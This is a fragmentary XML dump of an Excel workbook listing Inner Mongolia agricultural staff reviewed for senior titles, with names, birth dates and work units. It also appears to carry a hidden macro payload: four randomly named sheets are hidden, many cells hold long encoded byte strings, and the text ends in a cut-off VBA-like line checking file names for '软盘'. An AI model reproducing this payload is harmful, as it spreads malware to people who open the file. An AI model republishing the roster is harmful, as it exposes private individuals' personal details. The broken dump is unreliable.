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940" yWindow="1455" windowWidth="17400" windowHeight="11085" firstSheet="1" activeTab="6"/>
  </bookViews>
  <sheets>
    <sheet name="ASRQNO" sheetId="3" state="hidden" r:id="rId1"/>
    <sheet name="POMYRPQISRPRWQYZOP" sheetId="6" state="hidden" r:id="rId2"/>
    <sheet name="OIOWJPOIELRKRZMFRN" sheetId="5" state="hidden" r:id="rId3"/>
    <sheet name="TZMQLDLMSQTVPN" sheetId="4" state="hidden" r:id="rId4"/>
    <sheet name="正高" sheetId="8" r:id="rId5"/>
    <sheet name="农业" sheetId="7" r:id="rId6"/>
    <sheet name="畜牧" sheetId="2" r:id="rId7"/>
  </sheets>
  <calcPr calcId="114210"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3069" uniqueCount="1109">
  <si>
    <t>松山区上官地镇政府农业站</t>
  </si>
  <si>
    <t>1974/03</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>蔬菜</t>
  </si>
  <si>
    <t>赤峰市农业多种经营管理站</t>
  </si>
  <si>
    <t>宋宝香</t>
  </si>
  <si>
    <t>1978/06</t>
  </si>
  <si>
    <t>赤峰市农畜产品质量安全管理站</t>
  </si>
  <si>
    <t>辛冬斌</t>
  </si>
  <si>
    <t>农产品质量安全监管</t>
  </si>
  <si>
    <t>赤峰市农业环保能源站</t>
  </si>
  <si>
    <t>王翠艳</t>
  </si>
  <si>
    <t>1978/07</t>
  </si>
  <si>
    <t>农村能源农业环保</t>
  </si>
  <si>
    <t>赤峰市喀喇沁旗西桥镇农业技术推广服务中心</t>
  </si>
  <si>
    <t>宋世强</t>
  </si>
  <si>
    <t>1966/07</t>
  </si>
  <si>
    <t>赤峰市克什克腾旗新开地乡政府农科站</t>
  </si>
  <si>
    <t>张秀华</t>
  </si>
  <si>
    <t>1971/11</t>
  </si>
  <si>
    <t>赤峰市克什克腾旗经棚镇农科站</t>
  </si>
  <si>
    <t>于占广</t>
  </si>
  <si>
    <t>1972/02</t>
  </si>
  <si>
    <t>赤峰市克什克腾旗万合永镇农科站</t>
  </si>
  <si>
    <t>刘俊杰</t>
  </si>
  <si>
    <t>赤峰市克什克腾旗宇宙地农科站</t>
  </si>
  <si>
    <t>王悦娟</t>
  </si>
  <si>
    <t>赤峰市林西县农业技术推广服务中心</t>
  </si>
  <si>
    <t>韦秀兰</t>
  </si>
  <si>
    <t>1960/05</t>
  </si>
  <si>
    <t>赤峰巴林左旗隆昌镇政府农牧业服务中心</t>
  </si>
  <si>
    <t>周喜爽</t>
  </si>
  <si>
    <t>李虎</t>
  </si>
  <si>
    <t>赤峰市右旗农业局</t>
  </si>
  <si>
    <t>赵海春</t>
  </si>
  <si>
    <t>1974/11</t>
  </si>
  <si>
    <t>赤峰市敖汉旗农业局</t>
  </si>
  <si>
    <t>孙凯旭</t>
  </si>
  <si>
    <t>1964/10</t>
  </si>
  <si>
    <t>赤峰市喀喇沁旗水利局水产管理站</t>
  </si>
  <si>
    <t>羿淑红</t>
  </si>
  <si>
    <t>1963/04</t>
  </si>
  <si>
    <t>水产工程</t>
  </si>
  <si>
    <t>高级工程师</t>
  </si>
  <si>
    <t>赤峰市宁城县黑里河政府农牧业综合服务中心</t>
  </si>
  <si>
    <t>冯国军</t>
  </si>
  <si>
    <t>农机工程</t>
  </si>
  <si>
    <t>赤峰市农牧业机械化研究推广中心</t>
  </si>
  <si>
    <t>季风国</t>
  </si>
  <si>
    <t>1960/02</t>
  </si>
  <si>
    <t>农机管理</t>
  </si>
  <si>
    <t>赤峰市元宝山区五家镇农机站</t>
  </si>
  <si>
    <t>周玉慧</t>
  </si>
  <si>
    <t>赤峰市林西县十二吐乡农机站</t>
  </si>
  <si>
    <t>程振国</t>
  </si>
  <si>
    <t>1962/12</t>
  </si>
  <si>
    <t>农业机械</t>
  </si>
  <si>
    <t>锡盟农业科学技术推广站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>张丽丽</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>女</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1967/03</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农业</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>高级农艺师</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟太仆寺旗农牧局种子管理站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>丁希芝</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>汉</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1970/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟太仆寺旗红旗镇工作站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>闫林萍</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1963/07</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟多伦县农广校</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>孙亚梅</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1974/05</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>乌兰察布市农业科学研究所</t>
  </si>
  <si>
    <t>胡冰</t>
  </si>
  <si>
    <t>农业技术研究</t>
  </si>
  <si>
    <t>乌兰察布市园艺所</t>
  </si>
  <si>
    <t>王永宏</t>
  </si>
  <si>
    <t>蔬菜、果树</t>
  </si>
  <si>
    <t>乌兰察布市种子管理站</t>
  </si>
  <si>
    <t>戎素平</t>
  </si>
  <si>
    <t>乌兰察布市土壤肥料站</t>
  </si>
  <si>
    <t>王奋宇</t>
  </si>
  <si>
    <t>丰镇市农业局多种经营站</t>
  </si>
  <si>
    <t>郭利平</t>
  </si>
  <si>
    <t>乌兰察布市集宁区农牧业局</t>
  </si>
  <si>
    <t>邓海霞</t>
  </si>
  <si>
    <t>农技推广</t>
  </si>
  <si>
    <t>察右后旗经济作物工作站</t>
  </si>
  <si>
    <t>李玉兰</t>
  </si>
  <si>
    <t>兴和县城关镇人民政府</t>
  </si>
  <si>
    <t>王学芬</t>
  </si>
  <si>
    <t>凉城县农业技术推广中心</t>
  </si>
  <si>
    <t>高山明</t>
  </si>
  <si>
    <t>四子王旗农牧业机械管理站</t>
  </si>
  <si>
    <t>张志荣</t>
  </si>
  <si>
    <t>察右中旗科布尔镇农业服务综合站</t>
  </si>
  <si>
    <t>王拴云</t>
  </si>
  <si>
    <t>鄂尔多斯市达拉特旗农技推广中心</t>
  </si>
  <si>
    <t>李文连</t>
  </si>
  <si>
    <t>鄂尔多斯市达拉特旗农畜产品质量安全检测中心</t>
  </si>
  <si>
    <t>马丽</t>
  </si>
  <si>
    <t>鄂尔多斯达旗水产工作站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>韩永峰</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>男</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1968/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>水产养殖</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>高级工程师</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>鄂尔多斯杭锦旗独贵特拉农业技术推广站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>刘挨祥</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1972/03</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>巴市农科院</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王瑞莲</t>
  </si>
  <si>
    <t>1966/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>玉米育种</t>
  </si>
  <si>
    <t>马  捷</t>
  </si>
  <si>
    <t>1976/04</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">向日葵选育  </t>
  </si>
  <si>
    <t>巴市临河区农业技术推广中心</t>
  </si>
  <si>
    <t>苏化洲</t>
  </si>
  <si>
    <t>1963/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>巴市能源站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>鲁瑞英</t>
  </si>
  <si>
    <t>1981/03</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农村能源</t>
  </si>
  <si>
    <t>巴市农畜产品安全中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>张  斌</t>
  </si>
  <si>
    <t>1976/07</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>巴市土肥站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>郭俊婷</t>
  </si>
  <si>
    <t>1977/02</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>土壤肥料</t>
  </si>
  <si>
    <t>巴市推广站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王春梅</t>
  </si>
  <si>
    <t>1974/04</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>乌拉特前旗前旗水产站</t>
  </si>
  <si>
    <t>杨斌</t>
  </si>
  <si>
    <t>1974/08</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>渔业</t>
  </si>
  <si>
    <t>巴市农机投诉中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>耿利华</t>
  </si>
  <si>
    <t>1962/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农机设计</t>
  </si>
  <si>
    <t>乌海市农业产业化指导服务中心</t>
  </si>
  <si>
    <t>石春梅</t>
  </si>
  <si>
    <t>农牧业科学院</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王 永</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1971/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>蔬菜</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>研究员</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>杨海顺</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1963/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>燕麦栽培育种</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>李晓东</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1977/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>作物遗传育种</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>刘志雄</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1977/05</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>玉米遗传育种</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>孙峰成</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1975/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>贾有余</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1960/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>旱作农业与土壤肥料</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>副研究员</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>曹继龙</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1965/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>蔬菜育种</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>高级农艺师师</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>张立华</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1971/08</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农业科研</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王丽芳</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1975/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>动物营养</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>狄彩霞</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1976/12</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>检测与研究</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>石海波</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>内蒙古自治区园艺研究院</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>钟延平</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1975/06</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>内蒙古土肥站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>柳昱</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1969/02</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>内蒙古农广校</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>虞飞</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1961/08</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农业教育</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>正高</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>直属</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>赤峰市翁旗五分地镇农业站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>赤峰市翁旗梧桐花镇农业站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼和浩特市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>包头市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>通辽市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>赤峰市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>乌兰察布市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>鄂尔多斯市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>巴彦淖尔市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>乌海市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼和浩特市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>鄂尔多斯市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1965/12</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟草原工作站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>罗建英</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1962/05</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟农牧业科学研究所</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>崔志刚</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1971/08</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟东乌旗畜牧工作站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>金花</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1963/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟苏尼特左旗农业综合开发领导小组办公事</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>萨仁其其格</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1966/03</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟乌拉盖管理区农牧业局畜牧</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>陈秀亮</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1968/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟东乌旗农业综合开发办</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1975/12</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>210 179 200 189 72 234 154 59 39 141 117 236 168 89 132 201 235 150 131 91 214 193 207 205 33 73 162 41 64 69 79 179 200 208 50 44 239 162 70 238 142 231 168 156 124 167 87 117 52 205 27 194 217 95 117 227 197 110 131 23 151 145 192 253 252 205 242 197 41</t>
  </si>
  <si>
    <t>39 225 54 190 10 180 241 252 225 221 109 124 139 198 234 2 189 53 226 54 137 74 43 115 188 120 18 232 157 10 46 102 122 122 142 253 106 94 158 49 175 210 125 141 99 18 178 57 133 55 69 6 125 94 199 57 52 176 213 77 125 23 9 105 48 29 103 38 232 198 229 22</t>
  </si>
  <si>
    <t>122 129 249 165 141 103 179 145 217 113 205 49 89 127 243 10 179 168 205 163 13 194 118 90 90 34 75 136 203 136 109 231 229 60 173 19 82 11 166 69 94 178 41 70 26 253 137 133 115 254 220 50 209 38 102 205 141 209 143 211 185 200 37 61 181 82 202 166 198 1</t>
  </si>
  <si>
    <t>154 237 221 246 249 42 241 246 204 237 181 143 23 25 173 239 64 150 161 143 171 182 45 174 167 44 229 36 76 123 242 114 129 81 21 90 182 177 149 182 235 228 90 218 120 86 166 117 24 39 197 124 25 146 91 116 197 26 100 37 99 254 180 42 101 137 137 78 122 2</t>
  </si>
  <si>
    <t>167 234 49 24 124 82 133 31 18 116 176 240 245 15 160 176 87 129 98 115 115 95 78 225 44 245 240 117 146 149 234 202 19 109 147 53 58 134 58 52 150 190 46 85 147 105 102 68 213 212 214 102 154 105 26 178 117 117 64 238 210 169 76 35 109 109 42 85 143 30 6</t>
  </si>
  <si>
    <t>250 181 28 60 141 25 81 36 69 251 97 173 182 167 48 129 79 193 193 105 14 81 184 175 192 194 69 11 23 125 173 249 90 211 139 223 60 16 161 105 160 119 219 119 144 79 63 235 205 190 125 235 223 85 143 136 115 17 129 115 193 251 151 160 255 137 248 85 162 2</t>
  </si>
  <si>
    <t>103 73 144 32 83 9 130 59 218 140 151 95 254 74 120 57 171 226 229 171 129 151 43 13 47 79 99 188 28 97 25 154 1 114 6 180 2 208 110 64 23 1 93 7 244 5 242 24 196 47 95 103 188 252 82 241 114 171 192 203 235 171 96 221 251 44 120 209 241 63 235 226 235 12</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</si>
  <si>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t>
  </si>
  <si>
    <t>195 78 6 92 58 202 171 66 75 199 49 8 122 56 244 30 19 250 46 211 171 24 244 6 109 12 122 20 129 209 205 190 173 172 90 70 89 46 223 75 199 32 232 181 66 175 230 190 182 216 176 91 213 123 157 17 15 189 161 42 6 61 138 193 0 208 19 31 33 91 62 175 191 173</t>
  </si>
  <si>
    <t>223 198 160 71 17 25 89 6 112 167 203 235 186 217 187 85 127 146 158 239 211 11 79 35 218 40 227 95 66 107 134 222 78 20 122 244 101 12 18 117 75 87 163 252 15 165 120 246 140 195 11 0 128 67 75 237 93 123 120 21 197 21 63 187 55 55 185 185 9 225 134 71 1</t>
  </si>
  <si>
    <t>196 148 95 43 63 62 183 139 43 191 115 186 120 193 81 214 145 210 211 188 86 74 79 238 200 72 134 210 180 234 196 190 24 253 99 177 152 102 241 250 213 226 241 11 38 107 144 199 171 40 19 241 201 37 162 176 58 106 31 57 211 75 170 79 239 124 62 209 127 18</t>
  </si>
  <si>
    <t>185 54 215 11 125 136 158 69 182 69 70 214 149 251 150 60 183 118 210 250 117 140 127 185 93 31 80 68 105 14 79 120 172 73 131 185 232 228 160 225 212 147 6 210 181 52 12 79 167 113 52 158 202 104 46 125 133 158 167 29 180 71 221 171 246 246 230 120 251 1</t>
  </si>
  <si>
    <t>250 254 123 239 111 25 209 207 243 232 19 176 255 135 157 126 73 19 54 123 55 113 158 121 61 153 93 126 191 176 139 31 18 118 255 38 97 55 111 38 238 43 104 6 174 98 118 186 176 177 153 127 128 217 241 59 133 13 205 252 4 57 192 239 68 217 7 136 251 1 254</t>
  </si>
  <si>
    <t>191 21 181 215 26 50 177 152 21 184 255 13 81 214 5 113 42 64 253 170 24 187 118 235 191 151 200 191 2 207 25 118 229 177 201 51 54 142 246 111 8 170 127 26 74 173 70 233 13 70 15 142 231 254 43 134 14 243 8 157 20 137 180 113 197 70 191 107 62 92 111 132</t>
  </si>
  <si>
    <t>110 211 92 130 173 112 9 200 94 11 43 77 222 138 46 32 187 230 31 209 29 69 93 148 43 44 137 114 209 225 202 167 56 82 228 40 155 205 211 106 238 140 213 245 81 9 122 214 207 239 83 104 6 13 90 227 162 84 115 125 93 147 203 240 169 184 4 159 101 186 193 1</t>
  </si>
  <si>
    <t>67 75 220 93 15 112 83 199 153 223 247 244 108 75 178 85 100 254 4 7 28 88 43 54 150 193 8 217 49 14 201 17 34 255 227 79 98 140 177 13 49 169 26 44 91 207 88 69 150 132 36 199 38 144 86 14 134 115 166 92 107 200 77 135 164 190 68 36 153 14 189 50 115 110</t>
  </si>
  <si>
    <t>215 136 141 241 59 116 242 70 198 47 101 252 70 29 127 6 236 214 246 190 233 106 72 60 160 192 14 118 58 237 18 50 57 189 177 92 10 88 185 60 21 159 203 244 178 211 88 130 122 131 150 242 123 228 187 70 90 152 188 11 210 80 237 35 101 55 178 81 76 210 147</t>
  </si>
  <si>
    <t>183 135 143 82 89 118 26 213 254 125 41 75 158 190 233 100 229 159 202 140 15 185 208 78 48 180 147 211 121 80 255 128 147 128 83 128 23 1 167 1 175 0 38 1 103 0 105 130 172 253 3 90 1 139 8 142 153 212 219 214 206 232 236 203 163 253 221 168 142 155 39 1</t>
  </si>
  <si>
    <t>64 164 109 162 166 119 10 77 17 93 115 208 158 65 57 28 221 59 224 11 134 238 91 115 111 237 106 22 183 222 85 43 74 236 91 11 234 183 20 130 4 251 52 159 142 197 167 249 162 39 139 199 153 157 94 18 50 74 210 221 79 144 238 112 209 120 67 224 195 134 184</t>
  </si>
  <si>
    <t>146 83 241 121 150 207 36 132 91 97 30 210 158 91 225 185 51 55 83 14 101 232 159 69 90 190 227 72 173 135 221 186 181 234 36 200 95 4 121 90 162 212 172 66 176 82 32 99 115 33 202 88 167 197 59 145 123 61 78 3 210 153 68 171 215 5 188 166 23 16 173 227 1</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</si>
  <si>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t>
  </si>
  <si>
    <t>116 198 66 185 43 144 212 220 224 138 217 227 205 114 111 212 126 97 97 107 172 198 90 137 171 43 18 117 237 114 212 137 123 35 193 88 254 83 97 121 11 98 190 159 221 22 65 154 99 136 52 207 176 149 186 134 175 231 218 26 45 131 57 255 81 48 104 176 48 39</t>
  </si>
  <si>
    <t>备注：评审通过人员待答辩通过之后予以核准。</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>125 113 194 224 93 214 213 253 0 222 28 217 85 47 5 135 226 205 108 73 149 96 107 42 219 116 65 211 184 128 162 176 160 66 47 189 102 171 196 143 119 239 64 114 164 37 216 64 156 157 49 217 143 87 76 11 77 67 241 115 87 93 119 18 111 200 133 19 43 94 52 1</t>
  </si>
  <si>
    <t>235 203 42 28 162 16 221 251 63 161 179 47 87 109 221 97 127 65 28 62 246 61 177 184 26 23 86 190 32 62 35 70 131 81 161 235 135 190 39 100 188 22 175 70 85 213 120 57 174 114 86 43 53 94 244 245 216 54 199 111 43 106 28 223 90 181 104 245 7 171 231 20 90</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</si>
  <si>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t>
  </si>
  <si>
    <t>164 110 215 248 165 127 22 227 175 45 61 121 147 12 224 255 99 239 89 160 219 42 174 28 61 201 138 163 200 137 136 147 0 177 113 132 67 154 16 108 71 146 229 111 226 52 250 218 38 182 100 91 78 130 137 192 79 150 158 226 135 101 73 72 207 63 8 193 9 161 2</t>
  </si>
  <si>
    <t>72 45 229 40 35 130 123 20 240 6 77 60 5 32 236 10 155 51 93 225 210 34 252 88 168 216 11 138 169 140 153 200 213 180 23 88 201 86 114 185 86 18 115 124 126 107 222 14 7 175 189 133 196 243 201 148 134 214 31 243 119 230 145 145 125 34 253 181 139 242 246</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</si>
  <si>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t>
  </si>
  <si>
    <t>23 18 23 8 133 100 247 6 144 221 140 144 64 35 188 114 197 180 2 33 71 225 55 17 133 199 142 254 64 34 16 20 184 68 50 177 13 123 85 38 206 59 176 87 4 146 161 242 33 40 137 196 226 72 205 168 128 171 97 127 249 172 252 124 134 135 192 222 155 239 157 1 1</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>32 142 92 49 140 162 197 41 216 127 204 63 131 147 193 126 225 52 182 137 114 210 180 119 45 86 118 184 175 7 55 65 95 242 16 54 208 112 159 107 52 24 9 12 82 22 223 250 50 74 0 77 15 124 93 76 237 145 247 75 115 145 223 94 143 226 54 220 39 198 86 126 13</t>
  </si>
  <si>
    <t>163 50 167 34 215 15 241 66 195 99 108 230 200 226 125 47 162 36 243 209 164 112 220 47 139 122 134 0 4 55 190 136 200 120 151 24 89 112 88 49 192 103 161 36 70 198 154 16 169 21 239 135 230 207 68 18 19 70 155 68 165 208 205 137 235 143 217 1 6 50 59 110</t>
  </si>
  <si>
    <t>161 250 64 172 110 0 97 2 25 158 87 70 191 218 57 66 205 151 2 204 164 135 168 165 33 14 179 238 122 152 155 214 146 26 156 25 106 15 73 61 73 246 150 7 189 140 122 50 128 10 215 86 57 219 218 114 77 150 47 49 243 200 65 146 223 156 201 163 169 115 150 52</t>
  </si>
  <si>
    <t>61 171 183 77 60 80 212 115 230 187 88 55 173 47 52 208 210 89 212 163 79 247 120 159 217 58 191 123 124 12 161 47 250 212 227 88 254 123 190 207 239 60 241 173 219 183 170 160 212 214 158 36 187 209 115 167 71 159 190 214 179 236 222 162 158 70 207 200 4</t>
  </si>
  <si>
    <t>189 231 204 153 115 239 61 59 120 213 110 27 79 175 172 204 233 224 32 156 223 53 70 49 24 181 104 161 246 14 170 187 199 255 102 139 242 130 186 11 6 225 152 45 187 75 37 157 216 199 255 14 178 5 89 4 189 185 72 65 185 173 11 170 233 241 112 171 46 141 1</t>
  </si>
  <si>
    <t>171 123 45 126 253 19 45 220 19 212 230 110 235 188 158 126 164 215 53 237 193 11 207 146 141 150 103 91 253 218 196 247 236 78 171 31 192 226 122 146 223 150 47 115 85 60 208 5 229 116 205 135 173 230 114 38 73 59 190 87 15 95 183 129 71 74 75 160 233 52</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>168 205 219 50 31 232 163 47 142 17 170 79 248 233 153 12 88 78 20 106 169 147 132 225 73 180 137 63 77 24 186 68 251 243 143 51 174 252 191 20 63 18 51 126 96 37 110 198 236 6 60 192 240 128 67 70 234 93 63 5 68 85 174 30 241 77 226 3 64 84 223 26 111 98</t>
  </si>
  <si>
    <t>195 228 144 28 113 142 120 199 104 199 35 142 177 142 36 199 120 135 205 49 201 97 82 37 53 65 29 173 38 170 227 212 71 213 41 234 116 117 185 234 84 55 169 21 234 115 106 239 87 190 167 152 198 54 178 191 5 217 83 237 83 237 22 199 24 71 162 99 156 195 2</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</si>
  <si>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t>
  </si>
  <si>
    <t>168 31 175 65 189 209 218 67 42 184 223 219 253 120 203 231 5 62 231 137 77 199 190 243 155 154 247 218 199 208 185 218 38 106 43 122 232 1 183 102 137 7 1 121 46 158 200 121 117 78 226 97 173 14 126 189 2 97 227 180 254 23 191 7 183 241 214 144 95 95 211</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>186 111 225 75 228 45 36 48 141 182 76 174 105 239 52 247 32 132 197 253 147 211 15 38 225 171 199 246 113 134 186 55 106 224 151 124 216 0 22 195 240 224 87 176 178 239 189 99 13 244 248 199 4 148 7 56 18 126 205 236 95 101 9 248 204 216 69 174 74 132 21</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <r>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
